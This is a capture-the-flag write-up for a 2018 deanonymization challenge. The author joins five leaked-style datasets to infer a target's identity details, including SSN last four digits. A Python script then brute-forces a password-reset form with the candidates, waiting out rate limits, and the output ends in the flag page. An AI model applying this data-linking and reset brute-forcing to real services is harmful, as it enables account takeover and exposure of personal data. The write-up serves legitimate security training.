Link: https://squarectf.com/2018/deanonymization.html
This challenge provded several datasets along with a login page.
The login page contained a 'reset password' link which asked for the user's First Name, Last Name, Email Address, SSN, and Street. Using the five datasets provided and combining the data in each using matching metadata, I wrote an exhaust to submit several reset requests. Once the correct one was sent, the flag was returned. The script used is below.
import csvfile
import requests
import sys
data1 = csvfile.open('datasets/1.csv').load() # email,job_title,income
data2 = csvfile.open('datasets/2.csv').load() # email,state
data3 = csvfile.open('datasets/3.csv').load() # ssn_last_four,state,street
data4 = csvfile.open('datasets/4.csv').load() # income,state,street,postal
data5 = csvfile.open('datasets/5.csv').load() # first_name,street
# reset password: first name, last name, email address, last four social, street
lastname = 'Yakubovics'
job_title = 'Captain'
for p1 in data1:
if job_title != p1['job_title']:
continue
for p2 in data2:
if p1['email'] != p2['email']:
continue
for p3 in data3:
for p4 in data4:
if p3['street'] != p4['street']:
continue
if p4['income'] != p1['income']:
continue
for p5 in data5:
if p3['street'] != p5['street']:
continue
firstname = p5['first_name']
email = p1['email']
last_four = p3['ssn_last_four']
street = p3['street']
r = requests.post('https://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5/reset',data={'first_name':firstname,'last_name':lastname,'email':email,'ssn':last_four,'street':street},allow_redirects=False)
while r.status_code == 429:
time.sleep(10)
r = requests.post('https://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5/reset',data={'first_name':firstname,'last_name':lastname,'email':email,'ssn':last_four,'street':street},allow_redirects=False)
if r.status_code == 200:
print(r.text)
sys.exit(0)
print(r.status_code,r.headers['Location'], firstname, lastname, email, last_four, street)And the script output was:
$ ./gdpr.py
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Burk Yakubovics bthiolier3y@zimbio.com 5629 1345 Granby
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Christiane Yakubovics chawkyensjr@irs.gov 7506 61908 Magdeline
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Lothario Yakubovics lhinderha@360.cn 5212 9932 Parkside
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Enrique Yakubovics echoules89@studiopress.com 9991 347 American Ash
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Antonio Yakubovics aheathfield58@domainmarket.com 4467 60047 Talisman
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Kandy Yakubovics kglidden6r@skype.com 3355 4 Eliot
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Ario Yakubovics aearlam4s@cdbaby.com 4866 0500 Delladonna
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Blinnie Yakubovics bbeardkc@free.fr 1994 95 Sullivan
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Dredi Yakubovics dmesantjh@hhs.gov 3543 261 West
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Henrie Yakubovics hczajkowski7y@goodreads.com 1593 743 Corben
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Bartie Yakubovics bfarrere7@spiegel.de 5678 45973 Havey
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Virgina Yakubovics vglynnp@google.it 5945 61 Pond
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Hester Yakubovics hwinklend@google.ca 2702 5840 Carioca
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Weston Yakubovics whartopp84@csmonitor.com 0536 637 Redwing
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Estele Yakubovics bkydbl@technorati.com 2279 3 Eagle Crest
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Brier Yakubovics bkydbl@technorati.com 2279 3 Eagle Crest
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Estele Yakubovics bkydbl@technorati.com 4615 3 Eagle Crest
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Brier Yakubovics bkydbl@technorati.com 4615 3 Eagle Crest
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Catlin Yakubovics cshank9z@fastcompany.com 7279 504 Superior
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Trudie Yakubovics tworner5w@dailymotion.com 0020 8787 Alpine
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Pembroke Yakubovics pbunnq0@imgur.com 8930 30 Mallory
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Paddy Yakubovics prismanqv@networksolutions.com 5282 7524 Sunnyside
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Tabby Yakubovics tsallingeray@dailymail.co.uk 7890 12 Prentice
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Coretta Yakubovics coffajj@nationalgeographic.com 9320 25642 Sutteridge
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Sutherland Yakubovics sgullickcp@microsoft.com 0593 68463 Sage
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Peadar Yakubovics pricson7m@google.it 4077 9581 Pleasure
302 http://glacial-coast-79626.squarectf.com/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5?error=Sorry%2C+those+credentials+are+invalid. Willette Yakubovics wmilliered@bing.com 3161 110 Golf Course
<!DOCTYPE html>
<html lang='en'>
<head>
<link rel='stylesheet' type='text/css' href='/static/css/app.css' />
</head>
<body>
<div class='stars'></div>
<div class='container'>
<div class='form-container'>
<form id='reset' method='GET' action='/4WzKpfyFbgdEzO3ONxDPpIXdo9Qps5'>
<h2>Reset Password</h2>
<div class='form-group'>
<label for='current_password'>Current Password:</label>
<input name='current_password' type='password' value='flag-5ed43dc6356b2b68c689422769952b82' readonly />
</div>
<div class='form-group'>
<label for='new_password'>New Password:</label>
<input name='new_password' type='text' />
</div>
<div class='form-group'>
<button class='button' type='submit' form='reset' value='Submit'>Submit</button>
</div>
</form>
</div>
</div>
</body>
</html>